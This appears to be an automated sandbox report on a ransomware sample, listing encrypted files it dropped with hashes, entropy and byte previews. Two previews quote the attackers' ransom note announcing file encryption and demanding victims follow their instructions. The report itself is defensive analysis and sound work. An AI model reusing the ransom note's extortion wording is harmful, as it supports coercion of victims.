          Preview: )/r.VE..MR.pL.{p.5..C..0...r.<.'..O....[....ZD..2....Ck...^*:@.7.T.n&......*......5.o.....jc..;a.(^......jK.q...O...g.T..PP}*fz,...Op..I...s..K!.J.k..D.~....BV.....1x.............'".!...?n.`D..V.E...(e...v.,.*..w...Q.=i....Z."D{....9..l....#....n...r[....6,..?.n....v..2.*YNCB..HIF{si.....[.:.2g....dO......308P.....ak_2.F.........Fs....FK...l.0]si..........N`)J....|...uH..J...l..'.k.I.`..z..E<A.XvY{r...eJ...?.z..... ...W.....U..]y.uNV?2.B+zr....(.\}..`......p=O....N...{.Q._.?.8.8S#......f..P..~......).S.n4.t0.&...I...=hA..-*|'..cd)6.n.."2{.../.../.x.#.@.L......v.\..i:.......:pnhc.%.|q..v.U|..G5olNcT.....fl...Q...3&..%.u.l.....4...z......9.(..=.@..[!.+A]R._.+F.f1o.'...Y..5....k.M.p..M...1.L."...i.]....__e.]....8.Q.. ....jy..FK....$-............P}%.F..U...an..}.Z(X2....e....[..j.6..9.A.)d.a.......k..M.D......~)A<...8$.1.vx.....#.m..UO.....Y(.C.PY.d:.8...O9F5.yL....w}jF.......z?^.h.#.]c....-....|c.......1>_vVDW...=p...>...u....../b....
          C:\Users\user\Documents\ZTGJILHXQB.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.847628362017744
          Encrypted:false
          SSDEEP:24:DPEHFWcJ4v3gxgmZrocKfRdZjtAqEv6Lw5onGyhL5cXADn+zqNv5:UWcJ4vEgmaz1Fg6LwExdMu+uz
          MD5:C504742EA8CDDF5F0B2F3F17E5D21577
          SHA1:8FCE573AC0FD14ADCF9C145C1BE41C4DB45B1D08
          SHA-256:86CA0AD08A67A82A1AD8D8BACED30798408DC81C632C6B0B8D28F1773C7E7284
          SHA-512:DF5876016734587DB8EDD19D54C7EB538AAAAB87E6FC996E76ED66410FDE2DE96759E5ADFBE1E8923FC361CF7B444BB722ED25FCBAD0F47C7CE7AAD6CEF7430E
          Malicious:false
          Preview: )%M.m....BT.n...y.f.2e..,...{O....).cx=~....m^%......w67.e.^...+-.j{uu..iH..lqf..{.........N...........+(....C....z...XC....\...K..:._..6..^~/...V.../..IT.t.]....7.mj'Y.E.V.e.)...<..?...SV.G.|V...l.x.)....o.......7;..m.*MS.E...me..mb.u%[z..#s7..hG....).>..L+....K!ZS.K...V@hqGY..! ......lu>..ut.M..=.g..hL."..~.....3%...0<!...*..b..\../%..l4.w.2..4J.6...,.G.mR..l.c..1....'.@.......(Y...r\..L..o......F|?.9:9..kt.x.M\....@..8.........4.................*d..w.......9E0a.G.^9...Rx..%l.-..s..%...1P....gI\:TFG....^ub.....C..ngZ`,.i.........&x...`8...drs4Y.s....`prx....3u.Z..g.W..V./..n"............1.J=..2.,....U.s.....a..-~..9.$.@.\ .....7.XV.b>..6..{.;. .....B.!...X..D.^......9....kv?...._w[.QS.T........x..Zm..0.M.f<....&.L..R0.7..`..A..Unh..~............wD.c...:..'@WM+.....6...d...4....<..\.n..&.D.?......|....U7....t1`.E.Z.h.g......w.f&....-..9.4GB[......;..Y...?..}<"<@..'.;3W.p&<........}.....fJ>...h..J....ia...%.,.!..v......c.kF;...D.u.*O.`X.y...
          C:\Users\user\Documents\ZTGJILHXQB.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.8626429526495984
          Encrypted:false
          SSDEEP:24:xX/o4Sgm9/z95oSTb5q3nDc9UdSX/YHdmHCg77TXADn+zjp8f:xXg9J9Es6nDctXAHo9bu+fif
          MD5:0FEB5ECB4E27B3B3016779D760E5B3E7
          SHA1:C2EEA237F061E7DFEDBC14E4321ECA55EAAA3A1B
          SHA-256:BFBA26E793FC98B7735C885F591A9DECA7E1B926EBAEC459CDC00ECFEBF98603
          SHA-512:FA123B3633930A965C19FD4DF43C725AECA194283C856BBC53527A72E34F5BD41233F59C4C9098A57B2CA07C570D13EE9E559CAC718469F984D0114623118F13
          Malicious:false
          Preview: c.\r...>.w...W.v3i.X"..a.mDe...|.-y...[...*......}.w.bf....&n.GU>q-...Z=....j(..'.."c...nS;..H.h..2..d(...|.x...W.s.L..........0..>P......wTI.[..<V<....a.B..H..&fx~J....Q7&.?+..a.'..X....+..{....h..X....>...U".^[.g.....\X.W./..3u..D..]$?2ZEic.S....z.4......q..B...%...J...z..vt.."..=...[|F...a..Z...8.,U..BGd...)..O...eo.PM..!.px'{.....4:.@........C.Dn$..W......#....p.Ge.-.%......]..i....n..^T...F-.{R.O..).Y.B....(.....[.cg.N#'a..I.....2.%...p6...,..dzS..8..D.[...l2HC..d..B\u*.n.oBn.......'..$@...x...'$u3...H.}....L`i...R/..._..`b..c .1....j...d..C..t..Nc8..G\.2..X.D..pR/.|..5?U.....8..W.G...(^!L.F ^..w.......x.&t.......|....G..=...... .K-B<a....L.P..z..0.+..h....,....;.....-!O...W.=..C1.'.:u..[.`.......z+.;......{.(..E'...Z..9.<.p?Z..&A..}.....l..ux..$y.0...,s.F.V...U...Q..gCV..k{JfG..4.0.....E...K..A..t..7.."...?..9..w......*.....Y{j..&1....V...j..E.5R.9.Fd....aN._..V..Lozs.y.."......e....../.\.i...t....`&.H".D...A.!... .K..../P....|..
          C:\Users\user\Documents\ZTGJILHXQB\IPKGELNTQY.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.8424289096201685
          Encrypted:false
          SSDEEP:24:2m8BmuGWfiCb1oWhtbEK466/RlQC07idsiC9XADn+zr6:+kKf7BPhBIt/d07idsiuu+v6
          MD5:7B56875C9F11E5A960FFAAC64C7F74D5
          SHA1:9632C2F3430169C0164820BAE0ADE87501B12697
          SHA-256:99BFB0801FDE0AC7ECC50F3A16CEACCA9FA27593335C0FF5AAF0639A5D744503
          SHA-512:F6F67128A26BB60DAD7F7F4E529471EEAF78F81B302D7ADF87F20821AD281BF898C9484988147120B894289AB51598F2B42473150D8D2FBE183506DD9F5A5E4E
          Malicious:false
          Preview: ...........).....T........W0..$~..s....bM.U..sW..........wk...7...jV6.C.d4l.g......H.5m...AiN{.o}.4g?c4.PG...@.=.^.....u...9..0.}......;...+.R.>y...M...@-r$F....R.;fb.\6..{2...^.......t.VQ.fq.bc.\..Vk;@w.5.?:M1....5......t..b.......GBi.......Q.?g...<..$..~.e.......'.....o..<Hus...Aa.g....\_.......u .aCtm....I..TD.......<....t..A.Q.T..R]....i.HK."3....g.r.O.e]......z..EN."KF.I....a../...F ....m....\.Z..K.l.......?..e}.........q.j3D.1%.T.~.Wv8V"..97...a .V!.6)k.....(W.].B..ND.*.!.e...L}...5KD..g...B..._.L.f.8i....^.[#...>..UL.....h,...6...y1.Z...Hh...O.c7.M.3......T0.a.r.j..L....@..b..."|.A..Z...\ijW....X.x..f.../.c.*...#....;+.....B.s.sT.V.'l.\........4.yN.$f4.!.08c..N..+..:.G.fl.9.{e}.Z....0HW....O O ...z......E..1 ...L*d....O....a...............Z..Uv....{.1.'.w.9..Ro....tB..!..C....&..D..Pn..+q..s.AUT.<K..........x..q.t.,t.y...=,...hE.....yV.;Z.J....A.......m..6..&..A...!.I.6.%..C4....S..@.....,Q.x.=..6.].>..[.v....8..nF..l....#.V...\
          C:\Users\user\Documents\ZTGJILHXQB\PIVFAGEAAV.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.865892169050325
          Encrypted:false
          SSDEEP:24:vImY2FKQWgZA4VovoaVGI2YnNYTLrecXR2McHqbvG0XADn+zvIC1:vIXsKQW34so5DgKbvG0u+N
          MD5:B913571FBC99711AFD965135374AB088
          SHA1:C0549D112D769964736ABD7CE1E14E6305926B1C
          SHA-256:CC7362CC6D85F244E9B396A1E531C103053B083DBC8EF9F5ECE4A0211E70D083
          SHA-512:F123A8178EFD0E0F2DAFE8CF75BAF6131D80DF12957857E4EF0AB8605AFBAB559BD2318D5356064B4B1B583B17FEF8E48FA3DBF45D7302675091DDC60AC00196
          Malicious:false
          Preview: cy.`.......p..d...m...U.#.8.rV.C.....r..8r...x/eXZ.>+...b..8"...C1ib....DoC.@...h1.N.EO.sY5..+2]...I.?.....n.S2.-....S...X.0...`-..D.N...v...O....)B....B.S..,:...\..&..Kr .Fg 0..;.:0..-.W6.1.......aBg@..76)~.....*.-8.s{.j.6.2.(..u..p...ds.ac.....X....-.m...=e....5.3...9......@p.#...!...j..<_.....3.%0/r..E>+..eY..l.f....._.0...?.....JxdfL....q......&qj.........H.O.K{....D..K.c.....#........,_,D.4$y.....+.qk..h~~M....3.i7.....k..t.}...|.._U....#........F.........k.2p.2........<..e..f0.4.%I.;..U..I..........jh>.T.G.G0.=).je J.>H.......[.k?:...UK.._Q|.s..5.....|f.a..r......G.!v$E.....~..>.P.#N.l"4Fg.M.uSo<S%k.;/.]Q...]s}$.{1.p.D...?..`O'^+{.2p.....zj.Vc....>..5.fh.m.w.\U..%......d&A.zi...O.Z....../..1.{......a.M.G.5..W'J......q..4..g....P.&......n"..4.Sq.O...j.{.....{ip..iF..)OaT....t)z..........'.[.......u*?.=....1h..Mb./..o.l_m_.5.....<r....0.&@.eM.R.d:......!f.6..u......3.({D.Rf~c!M.\6a...r..c].o.....UG...s...w...Y..!m. ......3....@.m.sX4.....Q.6.[
          C:\Users\user\Documents\ZTGJILHXQB\QCFWYSKMHA.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.855500430124044
          Encrypted:false
          SSDEEP:24:rCEkL8plTZOR/5nC3t65vngUVSL1+nS+CsermXADn+zSDdW:ruYlsfJ5Zw1+nS+Cserau+OJW
          MD5:D6DA9F4F86A0B09C05E5D57514252044
          SHA1:3767434FFD654CABB371A3C8AD27909BC02AF437
          SHA-256:898EEB0EE4E265F68D86B311AB0F73859617149BA0E568CF4D3F33C50B581FD0
          SHA-512:6B09C42104586A6CA26D20528FF1B2B66B70EF1B69CD8E428DF0140FF339476CB48A7B8C7200850B848DD86CD82E4E3CE69C86A85D29FAFCA5AC9A5131484E18
          Malicious:false
          Preview: .J7.'..@..:.N.kp$t..@..............O/....n.....Y....U-..`.l..K.=......(....qG....[..H.,.o.. ....]vTiM0#..3.....q....... .......Sk.z%M..=>+x...Z..q%....!..o.....;.>.....2..w/.Un..F"L.u.(:.....n.B<..l...FU.[.9.......!...z>...5..4.$.....f.v.A.G\}..`.}..O........S.f5...>......>.. .......+....#.t..T.........t.H....{.....z....B.T...?.lf6......G......VBxa~....1.....{......./..........g..<1.7.e..X.h.;..a..{...4...\...Ml0.......k..?.(.v&..yK.I.z..%..@..%}.GC./RM.l..7.....F.u4......7..F.....i.n..I.........O9..k...e...t..?...V..^.....3,.'...N\.....#l.....N..'..2c..3.....,[,aU.....=27..^.6......U.x0...s.....L2......D3.`Q..fT.......Rz4.f..#/a.x.....cj....I_Z..ty(.*..........y.y.W.KEF,?w......-..[.J..7.lm.$._.1.0...X..B..^......+w.V....P....@.s..y...r`8GV..f.rJ...E.7I6E..x..EWM@.}.....)x%n]Tjh..h..s...e../[Q.1..[.T.m.P.v..:..D1.t.e[.Q.N..T.f.....`.66.[c...pg...vc0"1..9...`...[.p.H./&.P#b.....e....J.i&m.,.H..\.....\P>...Z{..Ori...Ea...>..+1a.~W..
          C:\Users\user\Documents\ZTGJILHXQB\UOOJJOZIRH.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.869632347136298
          Encrypted:false
          SSDEEP:24:splfgnYZtIeFsfA2nC23b0ceHMxVkc4EqoJLEppXADn+ztqa:spluYUPfALMOc4EPk9u+pqa
          MD5:E427D2096060955EFF561CD903A6C04D
          SHA1:FDC0BB3E172920DA91F31233531C8D97701DCAD7
          SHA-256:A39FC706854476F1458DD1AC007008F1343134116C2978114BA0CC0891520F1B
          SHA-512:5E7F44592A16DE18C844E4923DB8CF6B57DD7E4948F251C8001C505DA29C8827812F03A835BBB86C498D3F6CB85ECE137983B64E3392292FFF61B387731013DC
          Malicious:false
          Preview: .E.d.....dIL....F.z.$....4b.t.;V...,...HV.U(U.._....<gc.f..~!.r.B.@..n....?..[.....6.... QfD...i.......A.P(T.x. `...'.#....J./I.0.......\.e.u..#.L..s....z.r.w6jZ.x...\....#n...w,.D...i<<.*...#}N.R.m.0.C....NP.&..dhHYY.....P.9.t..'...Y.L4>.H..:&.f..B...U.)T.....5..o...D....0.$K. .h.6(..OX.....s...l.Yc.'.V.......'.D.k.w...r3...)0....*7..S..1..Y.%..-].K....UM....'...1...k#..d..ey.^C.....N'..$./qF.\Y.o.....5..}..~..@...].......-b.....c%.g..}D..T...,.D.p...W.E..6.R.!<...+..G.......o..^.}.p..]...i.7I...3..[.Z..s.{V.*5.X.q...U..B......F.>.'.q.z2..{..9.....]D...[T..._.;;......j9.....T.A.>F..,2W?5.s..G:..o_F&...B.x`q%.~`*...9.Vx....y.5.E..O=......-.1..J..g..U.Uo..*W~..~._..,.]`R..7.R.^.l.o..D-Mc|..........~.......m~.aiz-i.....$....L..........EEc"M.nE..k...r..;.J...8.k|...xL.U..O.L.;=..u...S.;[..w.<j..Hrg.,...o3.:...LN.).....+8.yr.?.>.....-.<.F.#..XI..../..Yq..Y<h#,.:kA'.v.I..b........0.>....\..bEB9.i....,...\<.ak(.Bi.....R....a./.[.S.r.S~%....!...R.
          C:\Users\user\Documents\ZTGJILHXQB\ZQIXMVQGAH.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.834754546919295
          Encrypted:false
          SSDEEP:24:bdFR1fVmbJ8R8P2JC4j2nJ3hcBpmkXF0c/GfL3u8odYyadugdXADn+zrQa:/VmbJ8CT4j2nJx0pmfcAuYyE5u+l
          MD5:1A8C23B01A19B42450B6E447BB5860C5
          SHA1:055EDE9DD919E41DBF0642224A23D24E1EB9DFB5
          SHA-256:A2B81DCD601414C612F2D452097FFC5F3829EE10F45E9DF2E456DB0F5CCD4689
          SHA-512:4B23B194984A06B26FFE411E140E6486430339448B86992C07E168C5914F06EC94F8465107055132908BB6C59D1B3A5EFF7AA51B369C1921B61F83D06E8CAB33
          Malicious:false
          Preview: 3..BYK7.eO.#.....1hz.'R...b?....&......rH.-.....N.SS..6.42.....*.|..<.....z.I2=YZ...%............wp.?Xen..sN%I..}>G.q#......~...0:Q.R.S}.u.X.I'..[.y....{.Q....E..t.i.....!8.z.h.ADG._.I..b!f..~#....>.R..`Q.y.L...Z..z...........Wy2?..x]g..h...;[Oq....B......K*.c?....uu..<CTu..qo\.S......o.._uq.F..q.Fa...b".xp..K.ZQY.S.GB...,3..RW{h..{....S.. .4./.....+.S..U........+.T.<..)q...}..I.r...+....(.A..*...,.p..........k.%....#..+..U.S.CI..P8:.I.RP;.I...f~....../..LG.X....m.0y.....JH...`.y]..+.".2..r0.a.y..i......]+A.....$N0\........h.h.%e.W...}....kUJ.t..p!7.. ..D.....Fa....{k...x.D...C.S...kE..P...=.......v..R...h...k.O`+.A"..}M.....b..Lj....h.......q..M...hR.T>..5....L.r.r....BSl+.i.[.B.3.O..... ....}..F.Mk..J..... ...m.J.g..F.D....}..4C.VCt.....:%.j=....B..8..]...a=..B....A"y...:[`v..O.=......I... X......obA...F..9.hV..K..{.#..D..J........4.2Rr.....2S..Z..?m...........[........1.._<.ip.|/%8)....2xt.....ma.o... .M.m....z..09w.BXv..8
          C:\Users\user\Documents\ZTGJILHXQB\ZTGJILHXQB.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.850365783842852
          Encrypted:false
          SSDEEP:24:R8B/3yAkWv3V2JlmcvN/9hp1APYI1J72s+NcZpL/bNLXADn+zTF:ekGlarF9hp1Gn750cZpL/b9u+t
          MD5:FBE487885E9CE5751C916D024F6CD7DC
          SHA1:7F101786A2066945417D28FBF24E58448C092712
          SHA-256:7E0C074708A54B22BCE32B59B162013A2FBF1BBA7E33DE70E67B4A5B05BFA33C
          SHA-512:CF20414D68492BE5CB02CEC28CC59B79BE423F9489F64D3E05EAE36F57938CE972E05FAC5B4C8AD213E7313A6D4B475597E3D1B3F4C3866AFC54EFA1A5C56AE6
          Malicious:false
          Preview: W..d4:i.3]?.(.r.....t.A..(.f..T.Y.[.E~S0.X...q..zWWN.../..h......A.D.X>...'yk(.. Cn.PlB9/..vn.my'..-..d.Rc"......X5...Dd.h,Cs..?g;Q....@}....G.u.!....v.......[..>>.9>....*.x...._k?|..-..rX.p.+...Ac~...Z,YLe.=.X..a......<...K...lbU..$.....MbLm$....>m...zp...Mg.1 ....:h.c.k.VW).@~.O.,.o.=.!....g...1.Le...c].......-..KMq....N...]..N......q..}.5......f.Yb.?z?.,oy...V........}.G3..Wu.R......#... .].&...?1....y....@.8r.....Ga.<+..%.(...R.L.$....`...v.^.@..I..4.s.r&c..K.....&.2.......b...k...|k..T..;.e_.O#u.N.....DP....o...P.....d..3..x.......,._....=.&....h........ky...9..nf...mb4.Y.i.Ib.D..D.r..?...:..vR.p............96i.J7..zg..I..C...*.......6...N..}']....[l.p9..Z_..(...{[......A.d.G'..3m8R.H..O.5...o....0....p....u......'..ci..z.>)..h.v..Xh.^..k....E.....Yb....{.@ .....v.%..g.j.....L....h.8c.b.;..z..........b..u.D.qi..m..(w.[.6.Q...a-...n..9..p.TQW.....q..-,..K....Y..R_.....8X\IJzv..}h[.oH......K.h.).x6.I.P.].)..h...,MNfTr]....Z@..E......a
          C:\Users\user\Documents\ZTGJILHXQB\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Documents\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Downloads\CURQNKVOIX.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.864144727218547
          Encrypted:false
          SSDEEP:24:kOUSH9tUJrtgaSwVVGV/gbXkgrnTqadT5x7vXlgHR5T5cg3XADn+zw:HfQNSL/6Rr+ad1VKHRRju+c
          MD5:9D9100E13CF329C4073924CE008976F6
          SHA1:9691CEED3B44CA94A1B42AF409C098EA072E62BD
          SHA-256:13417F8203E38200B297715742C09699BCFD5B458DE65F990C61C435E5CCF577
          SHA-512:6C575BC82FC45515DD147F12305E7385B437A0318D572298C9F2AD9AE83C7B8AB055E986E9CF8669ECCE975F7BA11F2F87A593AF52336EDBAA658D187FD828FC
          Malicious:false
          Preview: .Y...z......k.1.......C...$...J<..5C.v..........)>]...}.a.q...`^4.,N.;+..J.3q.OI.f..W].!.aeM...6t.2...e(.@R-........G..@=G....?...6.k...PnJ..E>....!8.......!....|....)..1.m.{....r)&.Y'y4i8.~.A^..%+s.....[z.../6D..V...y..~A_w\}mO.f...Q..>.j...s7._e......O.].-A..4.D.P.fJGf........v...l..0g8...>..8.....5*'.*C.G..U=...I._.w.[.}....o..3.......'c..........Eto...%..,....H.3..6J..'HX..d.'..RR.#.ZYx:;..#...E...x......a./fc.......\.-.......3.;.|^<B..}.....E..{^.wi.....[....W..$.Y7...;.?..3...h..mY..2M...-...............=...Z...w>Zw...h...U...@.C..,N.0\.XX.q]....^....KX...@..}.....LR.$.8....r(!.1O#...D.,.oNP..&.Ze....>..>g).<.eq...V..j.'......M\.b.K..5..Q......$i.pE.?8c.k...V....,.a..&J1.....{.(..|.X.S..Y..KT.....RY..jX....`.*."Y.Qs,<].'...A...Q... .[..<...._..T.{..[$.H.\.f.0-.....mJ{..$...c....W..ts. wF......r.._.$`..\..$..P.$....p........=FAD.o...N.x.C<...c/......)w.f.D.......L....../..&L.H.U..w.M..."...meOD.A9.F.P...h..e..N....>.#g2M.
          C:\Users\user\Downloads\FENIVHOIKN.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.841431406096934
          Encrypted:false
          SSDEEP:24:5I1lOpKQcfeQu89FS1uTJxN7pBtcCCzzWyXADn+zB3ss:54lOj0pJxN7pBuRHXu+b
          MD5:FBE51F15DCE2FA437D822517531CECE6
          SHA1:4B2D6F28EC037542DE5F6FE5026AFBE61202F021
          SHA-256:87FC41060E88C3B8260950CC64522176817165515A8C2A56C79F0827D9C97789
          SHA-512:1EA324848234CF19F8EDCE6A6C825CFACEF77DF6BC14E3225605DDFDF0D90235BA2F0550F1A876600A87C32A927F99AC1FB547068210C584C0B4463CFD450693
          Malicious:false
          Preview: ,...D. R.l..VY...9.#;..Ej..D:|>bKd6...&.j.%...gg.g../....?.8.Y9*.w..f....bh.6.j...&....1..u.1Q..@.TO.F..%6!..9..Q..;...H....aM?Z.c.._.........L/E.......9K.......~&r..V"^..o.#.a....%.Et.............k...0lu.R?.:..B.....MK.../..rg.S._n....GE.j...P...`.eKv.)O.3..?.-...XZ.D.....lS.:..e.){.f..aV....V.'=O..........z.an.,..y7..t..._..a.O?..|...t..L...Au.....c.z..G..i.mn...A..3...T..l......?-.g.'C...O..E..2.x./0.$<. .`.Z.9Ao.. t.......1.P....T:..C.....*..*G....G..........?........J.>o..G..*.YfM...Y.i..>.u..$@u..>>....q...4.[I..........W...t..G../"Z.`../.ULi.-.j...B.n....m/.%..4...1.b.......;.NuR..|.+.y@....1.4o.G.P.!.G.......^...")<..........U.(.d...WP....8u........??.B.&P...Q.y....*..!8..<..M....L,.;\0......(..O.T.@>......,...q".x|@....>..o...dr.&;..s....\..@......c....~.-/.S...]....^.:pEjnh.|.89j. ..!..e.P....J8..5F.K..x..D...D......&.x.vn......N...,.....r,/./Q.G.]..]r1/.V...+.~R.L.x....z,.$.;0`Z._.<.Q,P..7D<"...o.....~GZ.qV.H.<..c.p.+.bQ...
          C:\Users\user\Downloads\GRXZDKKVDB.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.852913842265682
          Encrypted:false
          SSDEEP:24:UOHaLLy/Wlvp7K6WUpW/8+UmUE1rEd3EjRYCltXADn+zLo:UWaLO/WlvVKPeDfdcRHu+Xo
          MD5:8E8F1D2FEC9F47E7C9228DD2376293D5
          SHA1:DD1BBE88DAFBB83ADCEC9965741CB7B1E67E5BB9
          SHA-256:461B4191EDFFDCE3AF210C2245F57BB5B5E72C489E676893F70A8B507FFCCCCF
          SHA-512:0B19624F01F0C830357D195CE1D0268E636DF0B0704215BAEB9141A793E230F3A9F4751B8A89070533756B4A3D266F54A422938BDE9C7E38EA7BECBA4A233AB1
          Malicious:false
          Preview: i.b. -.`.AL.fJ.-$bc...g.........;...Gb...i.O.4.m..D.......L.._.Y.AH.R..Y>(....w.?-y..J...A4...e...=..q.T.%...`A...P...x.e..s..&.R>V....nB.f.I.....B..gN..G....c.n..#e.$.......XB;}..{..Y..D........7K.[....NnR..G.|.....5A....x....2.{t....'.<d.`f*.U,..&.m...]....-o..R...)Jn.s`.'E..~GGq......9c.'9.j:d7PT>...T....~.>.....df.X_..s_..z...t..a.$h...U.f...v.......H~.N.;i..9..!@.a........0......s.|.3......m.p.`.a...60.%...4..[k..jX..n+..N\.Yz.......R...._.6.GF.]....}.q].....Q.U....t5.....?..4.<..+v..}..BB. )./>..[.4K.....};..b.G.>.Z..EW1......Q.._......0dm.jS,1m..P..8.ssC...Q.L...Br..VjT..K.....=t.?Y..j.2>..G....?~..Iksu.....I.....]7z.o..'.%.._..2O.a....<...e.....N.^zv.e...q......h.N...so.T........s....._....j}-. J..e.X..?v.&}Y.......ZN...7..Ujc.<...Gy..%L...+..g.2.}..............Q../."N..q/....,...s1........s../.j..sj;.%o.[P[....[;l...!...\.=...G..y&:_..'D&..'..............aZ "....f4.....7..M..@^..b..]..._.3.g.X{:...p..LF4.@.&...u..L;.4S......od
          C:\Users\user\Downloads\IPKGELNTQY.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.834588582506782
          Encrypted:false
